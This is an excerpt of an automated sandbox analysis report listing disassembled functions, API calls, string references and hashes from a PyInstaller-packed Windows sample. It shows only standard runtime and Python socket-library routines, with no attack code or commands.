Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction ID: fddc892f905377e5c9ac2dbfed2311a6bed1831833bf9a42d32a1ffeb0a4a2a2
Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction Fuzzy Hash: CB218E72A1AB8182F670EB61B8817E6B3A4FB88384F80017DFE8C47659DF7CD6458750

Function 00007FFEDD277B74 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44networkCOMMON

Download Yara Rule

APIs

getservbyname.WS2_32 ref: 00007FFEDD277BE2
htons.WS2_32 ref: 00007FFEDD277C25

Strings

service/proto not found, xrefs: 00007FFEDD277C05
socket.getservbyname, xrefs: 00007FFEDD277BB4
s|s:getservbyname, xrefs: 00007FFEDD277B84

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: getservbynamehtons
String ID: service/proto not found$socket.getservbyname$s|s:getservbyname
API String ID: 3889749166-1257235949
Opcode ID: 68eba5670ff14576cece73f52d08d650a9a7bf835ee56f3a8bf647e0bb2929f3
Instruction ID: 3fdda837f0f18e044af313f87bd5d269dcf057bdb4011c222fcae50b3093c7ec
Opcode Fuzzy Hash: 68eba5670ff14576cece73f52d08d650a9a7bf835ee56f3a8bf647e0bb2929f3
Instruction Fuzzy Hash: 4111EA61A08B42A2EB309B15E84427D6371FBC9BA5F580037DA4D47E74EF7DD449C710

Function 00007FF79A329AF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF79A329B1D
GetProcAddress.KERNEL32 ref: 00007FF79A329B33
FreeLibrary.KERNEL32 ref: 00007FF79A329B5A

Strings

mscoree.dll, xrefs: 00007FF79A329B14
CorExitProcess, xrefs: 00007FF79A329B2C

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction ID: 2e20c439f850b9cc883e699072db82c390d648411c02f8f99ca6c56cfe179dbd
Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction Fuzzy Hash: 7BF04F21E0A60682FA60AB34A899379B360AF45761FD406BDDA6E461E4DF2CD444C320

Function 00007FFEDD23A79C Relevance: 7.7, APIs: 5, Instructions: 162encryptionCOMMON

Download Yara Rule

APIs

00007FFEDDCAD2CC.PYTHON312 ref: 00007FFEDD23A7BE

Part of subcall function 00007FFEDD23C500: CertOpenStore.CRYPT32 ref: 00007FFEDD23C52C

GetLastError.KERNEL32 ref: 00007FFEDD23A7F7
CertEnumCRLsInStore.CRYPT32 ref: 00007FFEDD23A888
CertFreeCRLContext.CRYPT32 ref: 00007FFEDD23A90D
CertCloseStore.CRYPT32 ref: 00007FFEDD23A968

Memory Dump Source

Source File: 00000002.00000002.1751719552.00007FFEDD231000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFEDD230000, based on PE: true

Associated: 00000002.00000002.1751677591.00007FFEDD230000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751719552.00007FFEDD250000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751719552.00007FFEDD259000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751719552.00007FFEDD25D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751883985.00007FFEDD260000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751922759.00007FFEDD262000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd230000_sppawx.jbxd

Similarity

API ID: Cert$Store$00007CloseContextEnumErrorFreeLastOpen
String ID:
API String ID: 966150261-0
Opcode ID: f021d72c0826bf4e5c6ac57c28d8ec2aa657f9230c691dd09dec7c463f0f1817
Instruction ID: ac6f952bf63a3bc840efae081629357c4a12a68ff50e63fe82f8c681fc99573b
Opcode Fuzzy Hash: f021d72c0826bf4e5c6ac57c28d8ec2aa657f9230c691dd09dec7c463f0f1817
Instruction Fuzzy Hash: C1611B36E0D64286EA39AF21995417C63A5EFC9FA4B1D443AC94E16FB4FE3DE442C300

Function 00007FFEDD277E74 Relevance: 7.6, APIs: 5, Instructions: 106COMMON

Download Yara Rule

APIs

GetIfTable2Ex.IPHLPAPI ref: 00007FFEDD277EB5
ConvertInterfaceLuidToNameW.IPHLPAPI ref: 00007FFEDD277F2D
FreeMibTable.IPHLPAPI ref: 00007FFEDD277F97
FreeMibTable.IPHLPAPI ref: 00007FFEDD277FF5
FreeMibTable.IPHLPAPI ref: 00007FFEDD278018

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: FreeTable$ConvertInterfaceLuidNameTable2
String ID:
API String ID: 1671601251-0
Opcode ID: 1c8d5fcfbe51bea9f06fff83d3df8c52d3ecb8378788f061d169f7a658b6a151
Instruction ID: 5b14b14ec9b5551136bc7ed8f28d4ce4dd43b7ee37b5161edcd0dec922db9936
Opcode Fuzzy Hash: 1c8d5fcfbe51bea9f06fff83d3df8c52d3ecb8378788f061d169f7a658b6a151
Instruction Fuzzy Hash: 25410835A18B82A2EB749B21A95437D73A0FFC5B65F080036D94E47AB4FF6CE4458B41

Function 00007FF79A3393D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF79A339400
_set_statfp.LIBCMT ref: 00007FF79A33941B
_set_statfp.LIBCMT ref: 00007FF79A339437
_set_statfp.LIBCMT ref: 00007FF79A339473

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: a43e02ceae4b777d456a7e579573dbd10ea9977e3b6ba35cc75c43da69c8ccd4
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: A2118262E5DA13A1FA74B134D477376B0446F59364EC40ABCEAAE062D6CE2C69414264

Function 00007FF79A32B400 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF79A32A613,?,?,00000000,00007FF79A32A8AE,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32B41F
FlsSetValue.KERNEL32(?,?,?,00007FF79A32A613,?,?,00000000,00007FF79A32A8AE,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32B43E
FlsSetValue.KERNEL32(?,?,?,00007FF79A32A613,?,?,00000000,00007FF79A32A8AE,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32B466
FlsSetValue.KERNEL32(?,?,?,00007FF79A32A613,?,?,00000000,00007FF79A32A8AE,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32B477
FlsSetValue.KERNEL32(?,?,?,00007FF79A32A613,?,?,00000000,00007FF79A32A8AE,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32B488

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: ccac5f17aa91da4f3bae42de7e7333904383ed8f97faa160faf07aaa8124ee46
Instruction ID: 1d2b2f241a8a0fadcbeede62a05a77b5e099780154514e6828fdbbb9954bb4c3
Opcode Fuzzy Hash: ccac5f17aa91da4f3bae42de7e7333904383ed8f97faa160faf07aaa8124ee46
Instruction Fuzzy Hash: 44113020F0F64281FA78B73599961B9F2815F447B0FD887BCDD3D466D6DE2CB8418220

Function 00007FF79A32B294 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF79A32B2A5
FlsSetValue.KERNEL32 ref: 00007FF79A32B2C4
FlsSetValue.KERNEL32 ref: 00007FF79A32B2EC
FlsSetValue.KERNEL32 ref: 00007FF79A32B2FD
FlsSetValue.KERNEL32 ref: 00007FF79A32B30E

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 189bd32c29972b75cbfb961d88c763c1323b9a0b7d58335ae669547dde4e0126
Instruction ID: de96ef790fffefeebc44034530ff6d9624b7c9bfa265193ce7353a4a1a40ef70
Opcode Fuzzy Hash: 189bd32c29972b75cbfb961d88c763c1323b9a0b7d58335ae669547dde4e0126
Instruction Fuzzy Hash: 58111820E1B20742F978BA7158156BAF2818F45324FD887BCED3E4A2D2DD2CB8014231

Function 00007FF79A326010 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A32604C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A326176
_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A32622C

Strings

verbose, xrefs: 00007FF79A326020

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: 8d0d28bd5b0e1e05dda1f02d465027fe5ca449077f58f0131e85165420268c35
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: 9291AB22A0AB4681F771AE35E45037DB6A1EF40B94F84817EDE4A423C6DF3CF8058361

Function 00007FF79A32FC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A32FF17

Part of subcall function 00007FF79A327AAC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A327AC9

Strings

UTF-16LEUNICODE, xrefs: 00007FF79A32FEB5
ccs, xrefs: 00007FF79A32FE52
UTF-8, xrefs: 00007FF79A32FE96

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction ID: 233d0ad5b0d599eb083509346c113782ae44eb483ce3b5d5adadfb5687adf87f
Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction Fuzzy Hash: 9981D032E0E24386F7757F39C110278B7A0AB11B48FD580BDDE099729ADB2DE921D761

Function 00007FF79A31D6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF79A31D6E3
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF79A31D77A
RtlUnwindEx.KERNEL32 ref: 00007FF79A31D7D4

Strings

csm, xrefs: 00007FF79A31D761

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction ID: a2f8247e661a3252d4eba9d4ae56190789f1f1c995bc78842721e4931de32f4e
Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction Fuzzy Hash: 1E519032B1A6028AFB24EF25E444A78B791EB45BD8F90817CDA4E47788DF7CE841C710

Function 00007FF79A31F2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF79A31F320
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF79A31F408

Strings

csm, xrefs: 00007FF79A31F45A
csm, xrefs: 00007FF79A31F342

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction ID: 2e01b78d3edcd89a96c3a41701cc8073a2d866be18c88203a4e20881a21ce714
Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction Fuzzy Hash: B351AE32A0928286FB74EE319544278B7A0EB54B88F94827EEA8D47795CF3CF451C710

Function 00007FF79A31EF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF79A31EFA7
_CallSETranslator.LIBVCRUNTIME ref: 00007FF79A31EFF3

Strings

RCC, xrefs: 00007FF79A31EFC3
MOC, xrefs: 00007FF79A31EFBB

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction ID: 9dbb84cbd7fe5899863eaf9d411033c2d980f4a947e9828f094150f78da7c031
Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction Fuzzy Hash: 4B617032909B8586E770EB25E4413AAF7A0FB85784F44427AEB9D07B95DF7CE190CB10

Function 00007FF79A317E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF79A31352C,?,00000000,00007FF79A313F23), ref: 00007FF79A317F22

Strings

%.*s, xrefs: 00007FF79A317EDB
\, xrefs: 00007FF79A317E87
%s%c, xrefs: 00007FF79A317E94

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
Instruction ID: f0f94f65abb296293535af719a6d8c2703c709ee808a3900b946d0e521de170b
Opcode Fuzzy Hash: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
Instruction Fuzzy Hash: 8831A52171EAC145FA31EB31A8507EAB354EB84BE4F84027DEA6D477C9DF2CD6458B10

Function 00007FFEDD2729A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetComputerNameExW.KERNEL32 ref: 00007FFEDD2729DD
GetLastError.KERNEL32 ref: 00007FFEDD273A1C

Strings

socket.gethostname, xrefs: 00007FFEDD2729B5

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: ComputerErrorLastName
String ID: socket.gethostname
API String ID: 3560734967-2650736202
Opcode ID: 3405576d76487752179143ca9e9ce24f0a64481455d61518cebafc033de9272a
Instruction ID: f1277cf02a282c63abe6fc49cf5625f50da5a7dfc95fe3498f5bc26cfea3f8c5
Opcode Fuzzy Hash: 3405576d76487752179143ca9e9ce24f0a64481455d61518cebafc033de9272a
Instruction Fuzzy Hash: 77310C35B0CB82A2E7349B21A81527E63B5FFC9BA5F5C0136D94E46AB4FE3CE504C600

Function 00007FFEDD2781B4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

inet_ntop.WS2_32 ref: 00007FFEDD278279

Strings

iy*:inet_ntop, xrefs: 00007FFEDD2781D5
invalid length of packed IP address string, xrefs: 00007FFEDD278203, 00007FFEDD27823D
unknown address family %d, xrefs: 00007FFEDD2782E1

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: inet_ntop
String ID: invalid length of packed IP address string$iy*:inet_ntop$unknown address family %d
API String ID: 448242623-2822559286
Opcode ID: ab44d76d1b164076f45daeca5ca6ce7bf90a398625dee8c8aaeb868895e3ae08
Instruction ID: f41761cec96adfd907e4f309a6192b38efc7d83cfcbae5e10e01c88ea21bbe27
Opcode Fuzzy Hash: ab44d76d1b164076f45daeca5ca6ce7bf90a398625dee8c8aaeb868895e3ae08
Instruction Fuzzy Hash: 8131DE31B18A83A1EA709B25E8646BD63A0FFC5B65F484433D94E87A74FE3CE448C711

Function 00007FFEDD27580C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

getsockopt.WS2_32 ref: 00007FFEDD27587B
getsockopt.WS2_32 ref: 00007FFEDD2758CE

Strings

ii|i:getsockopt, xrefs: 00007FFEDD27582C
getsockopt buflen out of range, xrefs: 00007FFEDD275911

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: getsockopt
String ID: getsockopt buflen out of range$ii|i:getsockopt
API String ID: 3272894102-2750947780
Opcode ID: af3ce2296ad6df31b560dfe693c2ad11b715f74eee13cbd364207e2ffc102eee
Instruction ID: 33f3a0eabdb9b71ecc647f4bb1f5219b8f44f24f6599f7413e990bca188d45a4
Opcode Fuzzy Hash: af3ce2296ad6df31b560dfe693c2ad11b715f74eee13cbd364207e2ffc102eee
Instruction Fuzzy Hash: CC31E972A1CA46D3EB348B25E44416EB3B0FBC4B64F541136EA8E86A74EF3CD445CB40

